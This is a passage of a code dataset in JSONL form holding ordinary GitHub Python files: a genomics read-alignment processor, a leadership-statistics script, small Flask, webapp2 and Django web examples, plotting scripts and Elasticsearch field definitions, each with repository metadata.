[None]*int(steps)\r\ny_t = [None]*int(steps)\r\nt = [None]*int(steps)\r\n\r\ny[0] = ic\r\ny_t[0] = ic_t\r\nt[0] = 0\r\nstart = time.clock()\r\ny_test = sys_rk4(C_c, Q_c, r, r_t, y[0], y_t[0], h)[0]\r\nend = time.clock()\r\n#for i in range(steps-1):\r\n# y[i+1] = sys_rk4(C_c, Q_c, r, r_t, y[i], y_t[i], h)[0]\r\n# y_t[i+1] = sys_rk4(C_c, Q_c, r, r_t, y[i], y_t[i], h)[1]\r\n# t[i+1] = i*h\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111, autoscale_on=False, projection='3d')\r\nplt.gca().set_aspect('equal', adjustable='box')\r\nax.grid()\r\nax.set_xlim3d(-1.5, 1.5)\r\nax.set_ylim3d(-1.5, 1.5)\r\nax.set_zlim3d(-1.5, 1.5)\r\nax.view_init(30,60)\r\n\r\nline, = ax.plot([], [], [], 'o-', lw=2)\r\n\r\nx1 = [None]*int(steps)\r\ny1 = [None]*int(steps)\r\nz1 = [0]*int(steps)\r\n\r\nfor i in range(len(y)):\r\n x1[i] = y[i][0]\r\n y1[i] = y[i][1]\r\n\r\n\r\ndef init():\r\n\r\n line.set_data([], [])\r\n line.set_3d_properties([])\r\n return line,\r\n\r\n\r\ndef animate(i):\r\n\r\n thisx = [0, x1[i]]\r\n thisy = [0, y1[i]]\r\n thisz = [0, z1[i]]\r\n\r\n\r\n line.set_data(thisx, thisz)\r\n line.set_3d_properties(thisy)\r\n\r\n return line,\r\n\r\nani = animation.FuncAnimation(fig, animate, np.arange(1, len(y)),\r\n interval=25, blit=True, init_func=init)\r\n\r\nplt.show()\r\n", "repo_name": "kungergely92/RBD", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 6173, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 86, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 86, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 93, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 99, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 99, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 105, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 123, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 127, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 127, "usage_type": "name"}, {"api_name": "time.clock", "line_number": 173, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}]}
+{"seq_id": "12835284651", "text": "import logging\nimport pysam\nfrom Bio import SeqIO\n\nfrom src.long_read_assigner import *\nfrom src.long_read_simple_assigner import *\n\nfrom src.long_read_profiles import *\nfrom src.polya_finder import *\nfrom src.polya_verification import *\n\nlogger = logging.getLogger('CSA')\n\n\nclass LongReadSimpleAlignmentProcessor:\n \"\"\" class for aggregating all assignment information\n\n Parameters\n ----------\n gene_info\n bams\n params\n printer\n counter\n \"\"\"\n\n def __init__(self, gene_info, bams, params, chr_record=None):\n self.gene_info = gene_info\n self.bams = bams\n self.params = params\n self.chr_record = chr_record\n\n self.assigner = LongReadSimpleAssigner(self.gene_info, self.params)\n self.profile_constructor = CombinedProfileConstructor(gene_info, params)\n self.polya_finder = PolyAFinder(self.params.polya_window, self.params.polya_fraction)\n self.polya_fixer = PolyAFixer(self.params)\n self.assignment_storage = []\n self.gene_region = (gene_info.start, gene_info.end)\n\n def process(self, intron_printer):\n self.assignment_storage = []\n self.gene_info.all_read_region_start = self.gene_info.start\n self.gene_info.all_read_region_end = self.gene_info.end\n\n for b in self.bams:\n self.process_single_file(b, intron_printer)\n\n if self.params.needs_reference:\n self.gene_info.all_read_region_start -= self.params.upstream_region_len\n self.gene_info.all_read_region_end += self.params.upstream_region_len\n self.gene_info.reference_region = \\\n str(self.chr_record[self.gene_info.all_read_region_start - 1:self.gene_info.all_read_region_end + 1].seq)\n self.gene_info.canonical_sites = {}\n return self.assignment_storage\n\n def process_single_file(self, bamfile_in, intron_printer):\n processed_reads = set()\n for genic_region in self.gene_info.genic_regions:\n for alignment in bamfile_in.fetch(self.gene_info.chr_id, genic_region[0], genic_region[1]):\n read_id = alignment.query_name\n if alignment.reference_id == -1:\n self.assignment_storage.append(ReadAssignment(read_id, None))\n continue\n if alignment.is_supplementary:\n continue\n if self.params.no_secondary and alignment.is_secondary:\n continue\n\n logger.debug(\"=== Processing read \" + read_id + \" ===\")\n\n # concat indels\n concat_blocks = concat_gapless_blocks(sorted(alignment.get_blocks()), alignment.cigartuples)\n if not concat_blocks:\n logger.warning(\"Read %s has no aligned exons\" % read_id)\n continue\n # correct coordinates to GTF style (inclusive intervals)\n sorted_blocks = correct_bam_coords(concat_blocks)\n read_start = sorted_blocks[0][0]\n read_end = sorted_blocks[-1][1]\n read_tuple = (read_id, read_start, read_end)\n if read_tuple in processed_reads:\n continue\n processed_reads.add(read_tuple)\n logger.debug(\"Read exons: \" + str(sorted_blocks))\n if self.params.needs_reference:\n if read_start < self.gene_info.all_read_region_start:\n self.gene_info.all_read_region_start = read_start\n if read_end > self.gene_info.all_read_region_end:\n self.gene_info.all_read_region_end = read_end\n\n #polya_info = self.polya_finder.detect_polya(alignment)\n #sorted_blocks, polya_info, exon_changed = self.polya_fixer.correct_read_info(sorted_blocks, polya_info)\n polya_info = PolyAInfo(-1, -1, -1, -1)\n\n combined_profile = self.profile_constructor.construct_profiles(sorted_blocks, polya_info)\n read_assignment = self.assigner.assign_to_isoform(read_id, combined_profile)\n\n #if exon_changed:\n # read_assignment.add_match_attribute(MatchEvent(MatchEventSubtype.aligned_polya_tail))\n read_assignment.polyA_found = (polya_info.external_polya_pos != -1 or\n polya_info.external_polyt_pos != -1 or\n polya_info.internal_polya_pos != -1 or\n polya_info.internal_polyt_pos != -1)\n read_assignment.polya_info = polya_info\n read_assignment.exons = sorted_blocks\n read_assignment.mapped_strand = \"-\" if alignment.is_reverse else \"+\"\n read_assignment.chr_id = self.gene_info.chr_id\n read_assignment.multimapper = alignment.is_secondary\n\n if intron_printer and self.chr_record and not alignment.is_secondary:\n chr_id = self.gene_info.chr_id\n read_start = sorted_blocks[0][0] - 10\n read_end = sorted_blocks[-1][1] + 10\n ref_region = str(self.chr_record[read_start - 1:read_end + 1].seq)\n gene_profile_index = 0\n gene_profile = combined_profile.read_intron_profile.gene_profile\n\n for i, intron in enumerate(combined_profile.read_intron_profile.read_features):\n if combined_profile.read_intron_profile.read_profile[i] != 1:\n intron_printer.add_intron_info(read_id, chr_id, \".\", intron, (0, 0), \"novel\", 0, 0, 0, 0, 0,\n 0)\n continue\n\n while gene_profile_index < len(gene_profile) and (\n gene_profile[gene_profile_index] != 1 or not overlaps(intron,\n self.gene_info.intron_profiles.features[\n gene_profile_index])):\n gene_profile_index += 1\n if gene_profile_index >= len(gene_profile) or gene_profile[gene_profile_index] != 1:\n logger.info(\"profile %s, index %d\" % (str(gene_profile), gene_profile_index))\n logger.info(\"read profile %s, index %d\" % (\n str(combined_profile.read_intron_profile.read_profile), i))\n\n reference_intron = self.gene_info.intron_profiles.features[gene_profile_index]\n gene_profile_index += 1\n is_consistent = reference_intron == intron\n left_diff = intron[0] - reference_intron[0]\n right_diff = intron[1] - reference_intron[1]\n\n ref_strand = self.check_canonical(reference_intron, ref_region, read_start)\n read_strand = self.check_canonical(intron, ref_region, read_start)\n if ref_strand is None:\n # reference intron is non-canonical\n if read_strand is None:\n # read intron is non-canonical as well\n intron_printer.add_intron_info(read_id, chr_id, \".\", intron, reference_intron,\n \"both_noncanonical\", 0, 0, 0, 0, left_diff, right_diff)\n else:\n # read is canonical\n strand, donor_up, donor_down, acceptor_up, acceptor_down = \\\n self.analyse_intron_sites(intron, ref_region, read_start, read_strand)\n if read_strand == '+':\n donor_diff = left_diff\n acc_diff = right_diff\n else:\n donor_diff = - right_diff\n acc_diff = - left_diff\n intron_printer.add_intron_info(read_id, chr_id, read_strand, intron, reference_intron,\n \"reference_noncanonical\",\n donor_up, donor_down, acceptor_up,\n acceptor_down, donor_diff, acc_diff)\n else:\n strand, donor_up, donor_down, acceptor_up, acceptor_down = \\\n self.analyse_intron_sites(intron, ref_region, read_start, ref_strand)\n if ref_strand == '+':\n donor_diff = left_diff\n acc_diff = right_diff\n else:\n donor_diff = - right_diff\n acc_diff = - left_diff\n if ref_strand != read_strand:\n intron_printer.add_intron_info(read_id, chr_id, ref_strand, intron, reference_intron,\n \"read_noncanonical\",\n donor_up, donor_down, acceptor_up,\n acceptor_down, donor_diff, acc_diff)\n else:\n intron_type = \"consistent\" if is_consistent else \"incosistent\"\n intron_printer.add_intron_info(read_id, chr_id, strand, intron, reference_intron,\n intron_type,\n donor_up, donor_down, acceptor_up, acceptor_down,\n donor_diff, acc_diff)\n\n if self.params.sqanti_output:\n indel_count, junctions_with_indels = self.count_indel_stats(alignment)\n read_assignment.set_additional_info(\"indel_count\", indel_count)\n read_assignment.set_additional_info(\"junctions_with_indels\", junctions_with_indels)\n read_assignment.introns_match = \\\n all(e == 1 for e in combined_profile.read_intron_profile.read_profile)\n\n self.assignment_storage.append(read_assignment)\n logger.debug(\"=== Finished read \" + read_id + \" ===\")\n\n def check_canonical(self, intron, ref_region, read_start, strand=None):\n intron_left_pos = intron[0] - read_start\n intron_right_pos = intron[1] - read_start\n left_site = ref_region[intron_left_pos:intron_left_pos + 2]\n right_site = ref_region[intron_right_pos - 1:intron_right_pos + 1]\n if (left_site == \"GT\" and right_site == \"AG\") and strand != '-':\n return '+'\n elif (left_site == \"CT\" and right_site == \"AC\") and strand != '+':\n return '-'\n else:\n return None\n\n def analyse_intron_sites(self, intron, ref_region, read_start, strand=None):\n seq_size = 10\n intron_left_pos = intron[0] - read_start\n intron_right_pos = intron[1] - read_start\n\n if strand is None:\n left_site = ref_region[intron_left_pos:intron_left_pos + 2]\n right_site = ref_region[intron_right_pos - 1:intron_right_pos + 1]\n if left_site == \"GT\" and right_site == \"AG\":\n strand = '+'\n elif left_site == \"CT\" and right_site == \"AC\":\n strand = '-'\n else:\n return None, None, None, None, None\n\n if strand not in ['+', '-']:\n return None, None, None, None, None\n\n left_upper = ref_region[intron_left_pos - seq_size:intron_left_pos]\n left_lower = ref_region[intron_left_pos + 2:intron_left_pos + seq_size + 2]\n right_upper = ref_region[intron_right_pos - seq_size - 1:intron_right_pos - 1]\n right_lower = ref_region[intron_right_pos + 1:intron_right_pos + seq_size + 1]\n\n # upstream and downstream here are relative to the genome\n if strand == \"+\":\n donor_upstream = left_upper.rfind(\"GT\")\n donor_downstream = left_lower.find(\"GT\")\n acc_upstream = right_upper.rfind(\"AG\")\n acc_downstream = right_lower.find(\"AG\")\n else:\n acc_upstream = left_upper.rfind(\"CT\")\n acc_downstream = left_lower.find(\"CT\")\n donor_upstream = right_upper.rfind(\"AC\")\n donor_downstream = right_lower.find(\"AC\")\n\n donor_upstream = seq_size - donor_upstream if donor_upstream != -1 else 0\n donor_downstream = 2 + donor_downstream if donor_downstream != -1 else 0\n acc_upstream = seq_size - acc_upstream if acc_upstream != -1 else 0\n acc_downstream = 2 + acc_downstream if acc_downstream != -1 else 0\n\n if strand == '+':\n return strand, donor_upstream, donor_downstream, acc_upstream, acc_downstream\n else:\n return strand, donor_downstream, donor_upstream, acc_downstream, acc_upstream\n\n def count_indel_stats(self, alignment):\n cigar_event_count = len(alignment.cigartuples)\n indel_events = [1, 2]\n indel_count = 0\n intron_cigar_positions = []\n for i in range(cigar_event_count):\n cigar = alignment.cigartuples[i]\n if cigar[0] in indel_events:\n indel_count += 1\n elif cigar[0] == 3:\n intron_cigar_positions.append(i)\n\n junctions_with_indels = 0\n for i in intron_cigar_positions:\n # indel right near intron\n if (i > 0 and alignment.cigartuples[i - 1][0] in indel_events) or \\\n (i < cigar_event_count - 1 and alignment.cigartuples[i + 1][0] in indel_events):\n junctions_with_indels += 1\n\n # indel separated by at most 'indel_near_splice_site_dist' matches from intron\n if (i > 1 and alignment.cigartuples[i - 2][0] in indel_events and\n alignment.cigartuples[i - 1][0] in [0, 7, 8] and\n alignment.cigartuples[i - 1][1] <= self.params.indel_near_splice_site_dist) or \\\n (i < cigar_event_count - 2 and alignment.cigartuples[i + 2][0] in indel_events and\n alignment.cigartuples[i + 1][0] in [0, 7, 8] and\n alignment.cigartuples[i + 1][1] <= self.params.indel_near_splice_site_dist):\n junctions_with_indels += 1\n\n return indel_count, junctions_with_indels\n", "repo_name": "ablab/platform_comparison", "sub_path": "src/alignment_processor_simple.py", "file_name": "alignment_processor_simple.py", "file_ext": "py", "file_size_in_byte": 14892, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "44046222161", "text": "import pandas as pd\nimport argparse\nimport os\nimport networkx as nx\nfrom collections import Counter\nfrom scipy.stats import binom_test\nfrom helpful_functions import source_names\n\ndef readArgs ():\n\tparser = argparse.ArgumentParser (description=\"statistics about semantic leaders\")\n\tparser.add_argument (\"--src-path\", required=True, type=str, help=\"directory contains the leadership scores\")\n\tparser.add_argument (\"--leaders-file\", required=True, type=str, help=\"file contains the leaders and their scores\")\n\tparser.add_argument (\"--leader-stats-file\", required=True, type=str, help=\"output file should contain aggregated leadership stats\")\n\tparser.add_argument (\"--leader-follower-stats-file\", required=True, type=str, help=\"output file should contain aggregated leadership/followee stats\")\n\targs = parser.parse_args ()\n\treturn args\n\ndef create_net (source_names, dyads_counter):\n\tG = nx.DiGraph ()\n\n\tG.add_nodes_from(source_names)\n\tn_edges = sum([dyads_counter[item] for item in dyads_counter])\n\tfor item in dyads_counter:\n\t\t# edge should point from follower to leader\n\t\tG.add_edge(item[1], item[0], weight=dyads_counter[item]/n_edges)\n\treturn G\n\ndef main (args):\n\tdf = pd.read_csv(os.path.join (args.src_path, args.leaders_file), sep=\";\")\n\trows = df[[\"s1\", \"s2\"]].values.tolist()\n\tpairs = list ()\n\tfor row in rows:\n\t\ts1, s2 = row[0], row[1]\n\t\tpairs.append ((s1, s2))\n\n\tleaders_followers = Counter (pairs)\n\n\tG = create_net (source_names, leaders_followers)\n\tpagerank = nx.pagerank_numpy (G, alpha=0.85)\n\t# include also a personalization factor\n\t\n\tleaders = Counter([x1 for x1, x2 in pairs])\n\tfollowers = Counter ([x2 for x1, x2 in pairs])\n\t\n\t# calculate the leader follower stats\n\titems = list ()\n\ttotal_dyads = sum([item[1] for item in leaders_followers.most_common (None)])\n\tfor item in leaders_followers.most_common (None):\n\t\titems.append ([item[0][0], item[0][1], item[1], item[1]/total_dyads])\n\n\tleaders_followers_df = pd.DataFrame (items, columns=[\"Leader\", \"Follower\", \"Count\", \"Probability\"])\n\n\t# calculate the leader stats\n\titems = list ()\n\tepsilon = 1e-10\n\tfor name in sorted (source_names):\n\t\tleader_prob = leaders[name]/(leaders[name] + followers[name] + epsilon)\n\t\tfollower_prob = followers[name]/(leaders[name] + followers[name] + epsilon)\n\t\tpval = binom_test([leaders[name], followers[name]], alternative=\"greater\")\n\t\tpr = pagerank[name]\n\t\titems.append ([name, leaders[name], f\"{leader_prob:.4f}\", f\"{pval:.4f}\", followers[name], f\"{follower_prob:.4f}\", f\"{pr:.4f}\"])\n\n\tleaders_df = pd.DataFrame (items, columns=[\"Name\", \"Count(role as leader)\", \"P(Name=leader)\", \"Pval\", \"Count(role as follower)\", \"P(Name=follower)\", \"PageRank\"])\n\n\t## Write to files\n\tleaders_followers_df.to_csv (os.path.join (args.src_path, args.leader_follower_stats_file), sep=\",\", index=False, header=True)\t\t\n\tleaders_df.to_csv (os.path.join (args.src_path, args.leader_stats_file), sep=\",\", index=False, header=True)\n\nif __name__ == \"__main__\":\n\tmain (readArgs())\n", "repo_name": "sandeepsoni/semantic-leadership-network", "sub_path": "scripts/leadership_stats.py", "file_name": "leadership_stats.py", "file_ext": "py", "file_size_in_byte": 2953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 19, "usage_type": "call"}, {"api_name": "helpful_functions.source_names", "line_number": 21, "usage_type": "argument"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 36, "usage_type": "call"}, {"api_name": "helpful_functions.source_names", "line_number": 38, "usage_type": "argument"}, {"api_name": "networkx.pagerank_numpy", "line_number": 39, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 51, "usage_type": "call"}, {"api_name": "helpful_functions.source_names", "line_number": 56, "usage_type": "argument"}, {"api_name": "scipy.stats.binom_test", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}]}
+{"seq_id": "46302704277", "text": "import webapp2\nimport os\nimport random\nimport jinja2\n#import taco_model\n\nfrom google.appengine.ext import ndb\n\n\nclass TacoFillingModel(ndb.Model):\n #list here all the properties of the entity\n tacoIn = ndb.StringProperty(required=True)\n\n\n\ndef get_bill():\n # Add a list of fortunes to the empty fortune_list array\n bill_list=[10, 15.5, 20, 25.5, 30]\n # Use the random library to return a random element from the array\n random_bill = random.choice(bill_list)\n return random_bill\n\ndef get_tacos():\n # Add a list of fortunes to the empty fortune_list array\n filling_list = get_all_tacos()\n # Use the random library to return a random element from the array\n if len(filling_list) == 0:\n random_filling = 'test-filling'\n else:\n random_filling = random.choice(filling_list)\n return random_filling\n\ndef get_all_tacos():\n #fillings = ['steak', 'carnitas', 'veggie', 'chicken', 'ground beef']\n fillings = TacoFillingModel.query().filter().fetch()\n only_fillings = []\n for fil in fillings:\n only_fillings.append(str(fil.tacoIn))\n return only_fillings\n\n# Remember, you can get this by searching for jinja2 google app engine\njinja_current_directory = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass TacosHandler(webapp2.RequestHandler):\n def get(self):\n results_template = jinja_current_directory.get_template('template/tacos_results.html')\n self.response.write(results_template.render(tacoType = get_tacos()))\n\n #this gets executed when you use a form with POST method and /tacos route\n def post(self):\n # get input from the html form\n new_filling_from_form = self.request.get('new-filling')\n tacoFilling1 = TacoFillingModel( tacoIn = new_filling_from_form)\n k = tacoFilling1.put()\n results_template = jinja_current_directory.get_template('template/add_taco.html')\n self.response.write(results_template.render(filling = k.get().tacoIn))\n\n\nclass BillHandler(webapp2.RequestHandler):\n def get(self):\n results_template = jinja_current_directory.get_template('template/bill_results.html')\n self.response.write(results_template.render(total = str(get_bill())))\n\n # def post(self):\n\n\nclass WelcomeHandler(webapp2.RequestHandler):\n def get(self):\n results_template = jinja_current_directory.get_template('template/welcome.html')\n self.response.write(results_template.render())\n\n\nclass AllFillingsHandler(webapp2.RequestHandler):\n def get(self):\n #results_template = jinja_current_directory.get_template('template/welcome.html')\n #self.response.write(results_template.render())\n self.response.write(get_all_tacos())\n\n# Route mapping\napp = webapp2.WSGIApplication([\n # This line routes the main url ('/') - also know as\n # The root route - to the Fortune Handler\n ('/', WelcomeHandler),\n ('/tacos', TacosHandler), #maps '/predict' to the TacosHandler\n ('/bill', BillHandler), #maps '/farewell' to the BillHandler\n ('/fillings', AllFillingsHandler),\n], debug=True)\n", "repo_name": "marianelamin/mvc-restaurant-only-tacos", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "google.appengine.ext.ndb.Model", "line_number": 10, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 10, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 12, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 12, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 20, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 30, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 42, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 48, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 63, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 71, "usage_type": "attribute"}, {"api_name": "webapp2.RequestHandler", "line_number": 77, "usage_type": "attribute"}, {"api_name": "webapp2.WSGIApplication", "line_number": 84, "usage_type": "call"}]}
+{"seq_id": "75092159446", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--filename', type=str, help=\"numberofcables\")\n args = parser.parse_args() \n filename = args.filename\n\n values = open(filename, \"r\")\n # values = values.read()\n valuesStr = values.read()\n print(valuesStr)\n\n ValuesList = list(valuesStr.split(\"\\n\"))\n cablesNum = []\n runtimeAv = []\n for value in ValuesList:\n value = list(value.split(\" \"))\n cablesNum.append(float(value[0]))\n runtimeAv.append(float(value[2]))\n\n p = np.poly1d(np.polyfit(cablesNum, runtimeAv, 2))\n cablesNumSpace = np.linspace(cablesNum[0], cablesNum[-1])\n plt.plot(cablesNum, runtimeAv, 'o', cablesNumSpace, p(cablesNumSpace), '-')\n plt.show()\nif __name__ == '__main__':\n main()\n", "repo_name": "IMRCLab/col-trans", "sub_path": "hardware/qp-solve/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "20109986150", "text": "import os\nfrom datetime import datetime\n\n# Run this example with LC_TIME=[other locale] to use a different\n# locale's datetime formatting, eg:\n#\n# LC_TIME=en_US python examples/datetimecol.py\n# or\n# LC_TIME=en_GB python examples/datetimecol.py\nos.environ.setdefault('LC_TIME', 'en_GB') # noqa\n\nfrom flask_table import Table, Col, DatetimeCol\n\n\nclass Item(object):\n def __init__(self, name, dt):\n self.name = name\n self.dt = dt\n\n\nclass ItemTable(Table):\n name = Col('Name')\n dt = DatetimeCol('Datetime')\n\n\ndef main():\n items = [\n Item('Name1', datetime.now()),\n Item('Name2', datetime(2018, 1, 1, 12, 34, 56)),\n ]\n\n table = ItemTable(items)\n\n # or {{ table }} in jinja\n print(table.__html__())\n\nif __name__ == '__main__':\n main()\n", "repo_name": "plumdog/flask_table", "sub_path": "examples/datetimecol.py", "file_name": "datetimecol.py", "file_ext": "py", "file_size_in_byte": 785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 206, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.environ.setdefault", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "flask_table.Table", "line_number": 21, "usage_type": "name"}, {"api_name": "flask_table.Col", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_table.DatetimeCol", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "70052238167", "text": "from django.shortcuts import render,redirect\nfrom compose.forms import MailForm\n\n\n\n# Create your views here.\n# def index(request):\n# return render(request,'load.html')\n\ndef index(request):\n if request.method == \"POST\":\n form = MailForm(request.POST)\n if form.is_valid():\n mail_item=form.save(commit=False)\n mail_item.save()\n return redirect('/')\n else:\n form=MailForm()\n return render(request,'load.html',{'form':form})\n\n\n\n", "repo_name": "ArunBalajiR/Django-Email-Editor", "sub_path": "compose/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "compose.forms.MailForm", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "compose.forms.MailForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "38434551120", "text": "from typing import List\n\nfrom django.contrib.postgres.fields import ArrayField\nfrom django.db import models\n\nfrom django_elasticsearch_dsl import Document, fields\nfrom django_elasticsearch_dsl.documents import model_field_class_to_field_class\n\nfrom swp.models.fields import CombinedISBNField, LongURLField\n\nmodel_field_class_to_field_class[CombinedISBNField] = model_field_class_to_field_class[models.CharField]\nmodel_field_class_to_field_class[LongURLField] = model_field_class_to_field_class[models.URLField]\n\nANALYZERS = {\n 'ar': 'arabic',\n 'bg': 'bulgarian',\n 'bn': 'bengali',\n 'ca': 'catalan',\n 'ckb': 'sorani',\n 'cs': 'czech',\n 'da': 'danish',\n 'de': 'german',\n 'el': 'greek',\n 'en': 'english',\n 'es': 'spanish',\n 'et': 'estonian',\n 'eu': 'basque',\n 'fa': 'persian',\n 'fi': 'finnish',\n 'fr': 'french',\n 'ga': 'irish',\n 'gl': 'galician',\n 'hi': 'hindi',\n 'hu': 'hungarian',\n 'hy': 'armenian',\n 'id': 'indonesian',\n 'it': 'italian',\n 'ja': 'cjk',\n 'ko': 'cjk',\n 'lt': 'lithuanian',\n 'lv': 'latvian',\n 'nl': 'dutch',\n 'no': 'norwegian',\n 'pt': 'portuguese',\n 'ro': 'romanian',\n 'ru': 'russian',\n 'sv': 'swedish',\n 'th': 'thai',\n 'tr': 'turkish',\n 'zh': 'cjk'\n}\n\n\nclass TranslationField(fields.ObjectField):\n\n def __init__(self, attr=None, **kwargs):\n properties = {\n 'default': fields.TextField(analyzer='default'),\n }\n\n for language, analyzer in ANALYZERS.items():\n properties[language] = fields.TextField(analyzer=analyzer)\n\n super(TranslationField, self).__init__(attr, properties=properties, **kwargs)\n\n def get_value_from_instance(self, instance, field_value_to_ignore=None):\n return {\n 'default': super(fields.ObjectField, self).get_value_from_instance(\n instance=instance,\n field_value_to_ignore=field_value_to_ignore,\n ),\n }\n\n\ndef get_translation_fields(language, field_names):\n languages = [*ANALYZERS, 'default']\n\n if language in languages:\n languages.remove(language)\n languages.insert(0, language)\n\n return [f'{field}.{language}' for field in field_names for language in languages]\n\n\nclass FieldMixin:\n TRANSLATION_FIELDS: List[str] = []\n\n @classmethod\n def to_field(cls, field_name, model_field):\n if field_name in cls.TRANSLATION_FIELDS:\n return TranslationField(attr=field_name)\n\n if isinstance(model_field, ArrayField):\n base_field = Document.to_field(field_name, model_field.base_field)\n\n return fields.ListField(base_field)\n\n return Document.to_field(field_name, model_field)\n", "repo_name": "swp-berlin/webmonitor", "sub_path": "swp/documents/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2713, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django_elasticsearch_dsl.documents.model_field_class_to_field_class", "line_number": 11, "usage_type": "name"}, {"api_name": "swp.models.fields.CombinedISBNField", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": 